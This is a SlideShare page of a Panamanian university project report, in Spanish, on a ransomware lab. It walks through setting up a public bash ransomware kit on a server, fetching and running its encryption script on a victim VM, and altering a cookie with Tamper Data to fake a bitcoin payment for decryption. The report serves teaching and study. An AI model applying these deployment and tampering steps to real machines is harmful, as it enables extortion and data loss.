SlideShare una empresa de Scribd logo
Universidad Tecnológica de Panamá
Facultad de Ingeniería de Sistemas Computacionales
Licenciatura en Ingeniería de Sistema de Información
Curso:
Tópicos 1
Proyecto #1
“Bash-Ransomware”
Facilitador:
Jose Moreno
Integrantes:
Berrocal, Abdiel 8-891-2399
Monteza, Otman 8-892-586
Grupo:
1IF-252
En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del
repositorio en github: https://github.com/SubtleScope/bash-ransomware.
El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el
servidor donde se montarán los scripts del repositorio anteriormente mencionado y
otra máquina que nos servirá como cliente o víctima para este caso. En la
máquina víctima se ejecutará un script que cifrará todos los archivos del mismo.
Paso 1:
Crear una máquina virtual (Ubuntu server) que será la máquina server, en la cual
se montarán los scripts.
Para la segunda máquina podemos hacer un clon de la primera, ya que solo
ejecutaremos el script de cifrado en ella.
Figura #1
Paso 2:
Una vez encendida la máquina (Ransom-ServerSide) procederemos a descargar
los archivos del repositorio. Utilizamos el comando git clone para clonar el
repositorio en la máquina.
Comando: git clone https://github.com/SubtleScope/bash-ransomware
Figura #2
Paso 3:
Copiamos el contenido de la carpeta bash-ransomware en la dirección
/var/www/html
Le cambiamos los permisos con: chown -R www-data:root /var/www/html
Figura #3
Paso 4:
Dentro de la carpeta html se encuentran los archivos del repositorio que habíamos
clonado con anterioridad. En estos debemos realizar ciertas configuraciones que
la guía en github nos indican.
Imagen #4
En el archivo “target.php” debemos cambiar las líneas donde se manejan las
variables de tiempo (fecha y hora).
Figura #5
Paso 5:
Creación de la llave y certificados con openssl.
Figura #6
Una vez hecho esto, los movemos a la siguiente dirección: /etc/ssl/. En esta
existen dos carpetas: certs y private. Los moveremos de la siguiente manera:
Comando para mover el server.crt: mv server.crt /etc/ssl/certs/
Comando para mover el server.key: mv server.key /etc/ssl/private/
Imagen #7
Lo siguiente que haremos es reiniciar el ssl con el comando: a2enmod ssl.
Después reiniciamos el apache con: systemctl restart apache2.
Paso 6: seguimos con las configuraciones, ahora es con el archivo “crypto.sh”.
Primero nos dirigimos a la dirección “/var/www/html” si no nos encontrábamos allí
desde antes. Creamos la carpeta “downloads” con el comando mkdir (Ej. mkdir
downloads).
Configuramos el archivo crypto.sh con lo siguiente:
Figura #8
La primera línea nos indica que en todo el archivo cuando encuentre la cadena
“192.168.1.132” lo cambie por las Y’s (estas Y’s son la Ip de nuestro servidor).
La segunda línea es si lo queremos cambiar por un dominio.
Copiamos el archivo “crypto.sh” en la carpeta que habíamos creado “downloads”.
Paso 7: creación de la base de datos victims y exchange.
Creación de “victims”:
Figura #9
Figura #10
Creación de “exchange”:
Figura #11
Figura #12
Paso 8: lado del cliente o víctima.
Procedemos a descargar el archivo “crypto.sh”, que es el encargado de cifrar la
máquina cliente (víctima), utilizando el comando “scp” (secure copy) el cual se
comunica con ssh.
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/para/copiar /dirección/para/pegar
O el
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/origen /dirección/destino
Ejemplo: si el #puerto es distinto de 22 se debe escribir después de la opción -P, de otro
modo se puede dejar así.
Comando: scp user@YYY.YYY.YYY.YYY:/var/www/html/downloads/crypto.sh /home/user
Figura #13
Nota: “cuando se ejecuta este comando nos presentará una huella digital para la conexión en el
cual escribiremos “yes” para continuar, luego nos pedirá la contraseña del servidor al cual nos
queremos conectar. Si la contraseña se ingresó correctamente nos descargará (copiará) el archivo
que pedimos en la ruta de destino que elegimos.”
El user se cambia por el nombre de usuario y las Y’s se cambian por la ip del
server que se posea.
Paso 9: ejecución del script “crypto.sh”.
Estando aún en la máquina víctima le damos permiso 755 con el comando:
“chmod 755 crypto.sh”.
Luego lo ejecutamos utilizando sudo ./crypto.sh o si estamos en modo root,
solamente teclear ./crypto.sh.
Esperamos hasta que se termine de cifrar.
Figura #14
Una vez finalizado el cifrado, nos mostrará un mensaje como el de la “figura #14”
con la dirección a visitar y un “id”.
https://192.168.227.100/decrypt.php en este caso.
Paso 10: ingresar por medio del browser a la dirección dada en la “figura #14”
Figura #15
Procedemos a ingresar el “id” que nos muestra en la “figura #14”
Figura #16
También podemos observar el tiempo que le queda y otra información en
https://192.168.227.100/admin.php
Figura #17
Paso 11: le damos click en “Pay here”. Figura #16. Nos dirigirá al sitio de pago
donde haremos click en: “M4dH4t’z Exchange”.
Figura #18
Este a su vez nos dirigirá a esta otra página:
Figura #19
En la “Figura #19” nos registraremos. Este nos dará un (1) bitcoin, sin embargo,
para poder descifrar nuestros archivos necesitaremos 4 más.
Nos registramos utilizando:
Username: bobilibobili
Password: 12345
Figura #20
Paso 12: uso de la herramienta “Tamper Data”. Esta herramienta se puede
instalar en el navegador Firefox (navegador utilizado para este proyecto). Solo
debemos ir a instalar extensiones y buscar “Tamper data”.
Figura #21
Figura #22
Hacemos click en Tamper Data, luego en “Start” (iniciar).
Una vez iniciado le damos click en registrar, esto accionará lo siguiente en el
Tamper Data:
Figura #23
Le hacemos click en “Tamper”
Figura #24
Si nos fijamos en la figura #24 en la sección “Cookie” podemos observar la
cantidad de bitcoins que nos están dando. En este caso lo modificaremos con otro
valor distinto de uno (1), pero mayor a cinco (5), ya que para poder descifrar
nuestros archivos necesitamos cinco (5) bitcoins, es solo para asegurarnos de
tener los suficientes bitcoins.
Le asignamos cincuenta (50) bitcoins en la sección “Cookie”.
Figura #25
Le hacemos click en “OK” en la figura #25.
Figura #26
Nos dará nuestro id de transacción el cual deberemos copiar.
Paso 13: ingresar el id de transacción dado anteriormente.
Figura #27
Luego le damos click en “Pay”.
Nos mostrará el tiempo que debemos esperar para poder descifrar nuestros
archivos.
Figura #28
Paso 14: podemos observar nuevamente en https://192.168.227.100/admin.php si
se realizó el pago.
Figura #29
Paso 15: descargar los archivos para descifrar.
Figura #30
Paso 16: copiar los archivos descargados a la máquina víctima.
Para este caso utilizamos una tercera máquina con BackBox, en el cual
descargamos los archivos para descifrar y los copiaremos a la máquina victima
utilizando el comando, anteriormente mencionado, “scp”. Esta vez el comando
tendrá un ligero cambio, ya que copiaremos del BackBox a la máquina victima por
lo que escribiremos el comando de esta manera.
Comando: scp /dirección/backbox/copiar user@ipserver:/direccion/destino/pegado
Figura #31
Ejecutamos el decrypto.sh en la máquina víctima con el comando sudo
./decrypto.sh o si estamos en modo root escribir solamente ./decrypto.sh y
deberemos tener después nuestros archivos descifrados.
Figura #32

Más contenido relacionado

La actualidad más candente

Manual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia VaultManual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia Vault
Pedro Luis Pantoja González
 
Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7
santiago Ramirez Ramirez
 
Configuracion
ConfiguracionConfiguracion
ConfiguracionUTN
 
Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01DC FCP
 
Manual de Encriptacion con TLS
Manual de Encriptacion con TLSManual de Encriptacion con TLS
Manual de Encriptacion con TLSK-milo Rivera
 
Manual de squid creado por juanextk
Manual de squid creado por juanextkManual de squid creado por juanextk
Manual de squid creado por juanextkjuanextk
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Telefónica
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8
Eventos Creativos
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTPTerrafx9
 
Curso Squid avanzado
Curso Squid avanzadoCurso Squid avanzado
Curso Squid avanzado
Miguel Angel Nieto
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Telefónica
 
Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7
santiago Ramirez Ramirez
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centosmurilloyair
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
santiago Ramirez Ramirez
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
Francisco José Cruz Jiménez
 
Web centos
Web centosWeb centos
Web centosjessidi
 
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Max Morales
 
Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3
Pedro Luis Pantoja González
 

La actualidad más candente (20)

Manual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia VaultManual FTP, SSH y OpenMedia Vault
Manual FTP, SSH y OpenMedia Vault
 
Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7Configurar un servicio dhcp en centos 7
Configurar un servicio dhcp en centos 7
 
Configuracion
ConfiguracionConfiguracion
Configuracion
 
Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01Aprendiendopostgresql 090812172635-phpapp01
Aprendiendopostgresql 090812172635-phpapp01
 
Manual de Encriptacion con TLS
Manual de Encriptacion con TLSManual de Encriptacion con TLS
Manual de Encriptacion con TLS
 
Manual de squid creado por juanextk
Manual de squid creado por juanextkManual de squid creado por juanextk
Manual de squid creado por juanextk
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Lo que será windows 8
Lo que será windows 8Lo que será windows 8
Lo que será windows 8
 
Instalación y configuración de Nagios
Instalación y configuración de NagiosInstalación y configuración de Nagios
Instalación y configuración de Nagios
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Practica 2 FTP
Practica 2 FTPPractica 2 FTP
Practica 2 FTP
 
Curso Squid avanzado
Curso Squid avanzadoCurso Squid avanzado
Curso Squid avanzado
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7Crear un usuario virtual en el servidor vsftpd con centos 7
Crear un usuario virtual en el servidor vsftpd con centos 7
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centos
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
 
Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)Aplicaciones Web Seguras (Anti-SQLi)
Aplicaciones Web Seguras (Anti-SQLi)
 
Web centos
Web centosWeb centos
Web centos
 
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
 
Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3Manual Servidor Proxy Squid3
Manual Servidor Proxy Squid3
 

Similar a Bash Ransomware

Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
José Moreno
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
Edson Ortega
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
Tensor
 
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputSubiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
AnxnLeg
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
Agencia Aduanera Almeida
 
Vpn linux a linux
Vpn linux a linuxVpn linux a linux
Vpn linux a linux
xinoxino
 
Practica 15 21 qde cota
Practica 15  21 qde cotaPractica 15  21 qde cota
Practica 15 21 qde cotaJulio Padilla
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
EDUARDOFELIPERAMIREZ1
 
CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...
Elvis Vinda
 
Proyecto 5
Proyecto 5Proyecto 5
Proyecto 5davister
 
Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019
Alejandro Quesada
 
Tutorial Git y Smart Git
Tutorial Git y Smart GitTutorial Git y Smart Git
Tutorial Git y Smart Git
Miguel O. A. Tuyare
 
5 servidor web
5 servidor web5 servidor web
5 servidor web
angeles104
 
Servidor apache
Servidor apacheServidor apache
Servidor apache
Fausto Amador Mairena
 
Seguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque TroyanoSeguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque Troyano
alexander valencia valderrama
 
Team.docx
Team.docxTeam.docx
(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)Giovanny Echeverry
 
Tutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicasTutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicasUTP
 
configuracion de servicios en ubuntu
configuracion de servicios en ubuntuconfiguracion de servicios en ubuntu
configuracion de servicios en ubuntu
Patricia Guevara
 

Similar a Bash Ransomware (20)

Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
Uso del troyano cybergate ok
Uso del troyano cybergate okUso del troyano cybergate ok
Uso del troyano cybergate ok
 
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinputSubiendo shell y explotando vulnerabilidad lfi vía phpinput
Subiendo shell y explotando vulnerabilidad lfi vía phpinput
 
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
188997662 como-configurar-servidor-punto-multipunto-con-open vpn-y-cliente-en...
 
Vpn linux a linux
Vpn linux a linuxVpn linux a linux
Vpn linux a linux
 
Practica 15 21 qde cota
Practica 15  21 qde cotaPractica 15  21 qde cota
Practica 15 21 qde cota
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...CentOS 6.4 como DNS, Apache, SSL...
CentOS 6.4 como DNS, Apache, SSL...
 
Proyecto 5
Proyecto 5Proyecto 5
Proyecto 5
 
Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019Hack like a pro with custom VPS - Najava Negra 2019
Hack like a pro with custom VPS - Najava Negra 2019
 
Tutorial Git y Smart Git
Tutorial Git y Smart GitTutorial Git y Smart Git
Tutorial Git y Smart Git
 
5 servidor web
5 servidor web5 servidor web
5 servidor web
 
Servidor apache
Servidor apacheServidor apache
Servidor apache
 
Seguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque TroyanoSeguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque Troyano
 
Team.docx
Team.docxTeam.docx
Team.docx
 
(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)(Manual de instalación de cloud computing)
(Manual de instalación de cloud computing)
 
Tutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicasTutorial linux centos configuraciones básicas
Tutorial linux centos configuraciones básicas
 
configuracion de servicios en ubuntu
configuracion de servicios en ubuntuconfiguracion de servicios en ubuntu
configuracion de servicios en ubuntu
 

Más de José Moreno

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
José Moreno
 
Ransomware Hidden Tear
Ransomware Hidden TearRansomware Hidden Tear
Ransomware Hidden Tear
José Moreno
 
Seguridad Móvil
Seguridad MóvilSeguridad Móvil
Seguridad Móvil
José Moreno
 
Seguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixSeguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *Nix
José Moreno
 
Honey Pots
Honey PotsHoney Pots
Honey Pots
José Moreno
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
José Moreno
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIM
José Moreno
 
Forensia en movil
Forensia en movil Forensia en movil
Forensia en movil
José Moreno
 
Artefactos linux
Artefactos linuxArtefactos linux
Artefactos linux
José Moreno
 
MEAN Stack
MEAN StackMEAN Stack
MEAN Stack
José Moreno
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
José Moreno
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
José Moreno
 
Presentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasPresentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones Seguras
José Moreno
 
Hardening Telnet ssh final
Hardening Telnet ssh finalHardening Telnet ssh final
Hardening Telnet ssh final
José Moreno
 
Protección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoProtección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF Lógico
José Moreno
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qos
José Moreno
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-server
José Moreno
 

Más de José Moreno (17)

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Ransomware Hidden Tear
Ransomware Hidden TearRansomware Hidden Tear
Ransomware Hidden Tear
 
Seguridad Móvil
Seguridad MóvilSeguridad Móvil
Seguridad Móvil
 
Seguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *NixSeguridad en SIstemas Operativos *Nix
Seguridad en SIstemas Operativos *Nix
 
Honey Pots
Honey PotsHoney Pots
Honey Pots
 
Seguridad Perimetral
Seguridad PerimetralSeguridad Perimetral
Seguridad Perimetral
 
Correlacionador de Eventos OSSIM
Correlacionador de Eventos OSSIMCorrelacionador de Eventos OSSIM
Correlacionador de Eventos OSSIM
 
Forensia en movil
Forensia en movil Forensia en movil
Forensia en movil
 
Artefactos linux
Artefactos linuxArtefactos linux
Artefactos linux
 
MEAN Stack
MEAN StackMEAN Stack
MEAN Stack
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0Seguridad Base de Datos sql injection v1.0
Seguridad Base de Datos sql injection v1.0
 
Presentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones SegurasPresentacion #2 github Aplicaciones Seguras
Presentacion #2 github Aplicaciones Seguras
 
Hardening Telnet ssh final
Hardening Telnet ssh finalHardening Telnet ssh final
Hardening Telnet ssh final
 
Protección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF LógicoProtección de Sitios Web con WAF Lógico
Protección de Sitios Web con WAF Lógico
 
Laboratorio 7 mod security - evasive - qos
Laboratorio 7   mod security - evasive - qosLaboratorio 7   mod security - evasive - qos
Laboratorio 7 mod security - evasive - qos
 
Hardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-serverHardening en-nix-asegurar-un-ftp-server
Hardening en-nix-asegurar-un-ftp-server
 

Último

Actividad Conceptos básicos de programación.pdf
Actividad Conceptos básicos de programación.pdfActividad Conceptos básicos de programación.pdf
Actividad Conceptos básicos de programación.pdf
NajwaNimri1
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
SamuelRamirez83524
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVATECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
LilibethEstupian
 
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Telefónica
 
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
CesarPazosQuispe
 
Trabajo tecnología sobre Conceptos Básicos De Programación
Trabajo tecnología sobre Conceptos Básicos De ProgramaciónTrabajo tecnología sobre Conceptos Básicos De Programación
Trabajo tecnología sobre Conceptos Básicos De Programación
SofiaCollazos
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
zoecaicedosalazar
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
Emilio Casbas
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
AlejandraCasallas7
 
TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGATAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
arriagaanggie50
 
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdfDesarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
AlejandraCasallas7
 
Posnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativaPosnarrativas en la era de la IA generativa
Posnarrativas en la era de la IA generativa
Fernando Villares
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
coloradxmaria
 
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTALINFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
CrystalRomero18
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
JulyMuoz18
 
absorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratoriosabsorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratorios
JuanAlvarez413513
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
thomasdcroz38
 
Estructuras básicas_ conceptos básicos de programación.pdf
Estructuras básicas_  conceptos básicos de programación.pdfEstructuras básicas_  conceptos básicos de programación.pdf
Estructuras básicas_ conceptos básicos de programación.pdf
ItsSofi
 
3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto3Redu: Responsabilidad, Resiliencia y Respeto
3Redu: Responsabilidad, Resiliencia y Respeto
cdraco
 

Último (20)

Actividad Conceptos básicos de programación.pdf
Actividad Conceptos básicos de programación.pdfActividad Conceptos básicos de programación.pdf
Actividad Conceptos básicos de programación.pdf
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVATECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
TECLADO ERGONÓMICO Y PANTALLAS TACTILES - GESTIÓN INTEGRAL EDUCATIVA
 
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
 
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
 
Trabajo tecnología sobre Conceptos Básicos De Programación
Trabajo tecnología sobre Conceptos Básicos De ProgramaciónTrabajo tecnología sobre Conceptos Básicos De Programación
Trabajo tecnología sobre Conceptos Básicos De Programación
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
 
TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
TAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGATAREA #6 - RECURSOS INCLUSIVOS POR ANGGIE ARRIAGA
